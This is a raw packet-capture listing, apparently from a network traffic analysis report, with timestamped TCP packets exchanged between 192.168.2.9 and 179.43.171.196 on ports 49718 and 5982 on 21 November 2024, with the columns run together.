                                                                                                                                                              Nov 21, 2024 11:27:07.630471945 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.630520105 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.630539894 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.631083012 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.631129026 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.631158113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.822688103 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.822765112 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.822793007 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.823522091 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.823568106 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.823673010 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.824395895 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.824435949 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.824470997 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.825267076 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.825393915 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.825793028 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.826265097 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.826284885 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.826354980 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.826936007 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.826981068 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.827045918 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.827869892 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.827918053 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.827939987 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.828669071 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.828716993 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.828783035 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.829734087 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.829785109 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.829862118 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.830385923 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.830431938 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.830518961 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.831252098 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.831299067 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.831362009 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.832113028 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.832154036 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.832221985 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.832964897 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.833008051 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.833065987 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.833851099 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.833899975 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.833924055 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.834664106 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.834712982 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.834768057 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.835473061 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.835614920 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.975688934 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.975807905 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.975895882 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.976066113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.976188898 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.976241112 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.976950884 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.977042913 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.977135897 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.977817059 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.977931976 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.977983952 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.978673935 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.978785038 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.978833914 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.979518890 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.979743958 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.979789972 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.980359077 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.980452061 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.980494022 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.988322020 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.988418102 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.988466978 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.988729954 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.988996029 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.989044905 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.989545107 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.989675045 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.989722013 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.990380049 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.990657091 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.990714073 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.990835905 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.991539001 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.991595030 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.991647959 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.992399931 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.992520094 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.992594957 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.993278027 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.993336916 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.993419886 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.994119883 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.994169950 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.994203091 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.995021105 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.995069027 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.995109081 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998240948 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998320103 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.998358965 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998364925 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998369932 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998416901 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.998456955 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998495102 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.998514891 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998518944 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998527050 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.998564959 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.999495983 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.999547958 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.999619961 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.000149965 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.000193119 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.000206947 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.000987053 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.001095057 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.001127005 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.002321005 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.002363920 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.002474070 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.002685070 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.002815962 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.002875090 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.194590092 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.194643974 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.195353985 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.195395947 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.195504904 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.196137905 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.196289062 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.196336031 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.197051048 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.197210073 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.197258949 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.197870016 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.197982073 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.198191881 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.198725939 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.198911905 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.198961020 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.199584007 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.199691057 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.199738979 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.200519085 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.200532913 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.200598955 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.201303005 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.201395035 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.201442003 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.202127934 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.202239037 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.202325106 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.202977896 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.203072071 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.203128099 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.203882933 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.203891039 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.203949928 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.204721928 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.204806089 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.204859972 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.205607891 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.205811977 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.205991983 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.206430912 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.206517935 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.206571102 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.207293987 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.207405090 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.207627058 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.208158016 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.208271980 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.208362103 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.209007978 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.209116936 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.209872007 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.209943056 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.210055113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.210768938 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.210841894 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.210850000 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.211596966 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.211652994 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.211720943 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.212450981 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.212512016 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.212537050 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.212841988 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.213300943 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.213435888 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.213494062 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.214181900 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.214265108 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.214323997 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.215039968 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.215212107 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.215261936 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.215878010 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.215959072 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.216006994 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.216737032 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.216830015 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.216877937 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.217586994 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.217672110 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.217797995 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.218482971 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.218571901 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.218631983 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.219307899 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.266602039 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.359697104 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.359798908 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.359858990 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.360033035 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.360256910 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.360395908 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.360400915 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.361069918 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.361195087 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.361224890 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.361954927 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.362013102 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.362073898 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.362837076 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.362888098 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.362979889 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.363647938 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.363698959 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.363756895 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.364483118 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.364584923 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.372239113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.372284889 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.372349977 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.372416019 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.372555017 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.372642040 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.373291016 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.373435020 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.373613119 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.374119043 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.374202967 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.374254942 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.374743938 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.374845982 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.566646099 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.566768885 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.566816092 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.567504883 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.567667961 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.567760944 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.568350077 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.568417072 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.568454981 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.569233894 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.569384098 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.569612980 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.570074081 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.570193052 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.570329905 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.570980072 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.571033001 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.571078062 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.571836948 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.571856976 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.571903944 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.572648048 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.572774887 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.572844982 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.573523998 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.573689938 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.573736906 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.574353933 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.574511051 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.574660063 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.575210094 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.575391054 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.575438976 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.576101065 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.576164007 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.576265097 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.576962948 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.577013969 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.577058077 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.577986002 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.578090906 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.578254938 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.578646898 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.578835964 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.578883886 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:08.579499960 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.579521894 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:08.579602957 CET497185982192.168.2.9179.43.171.196
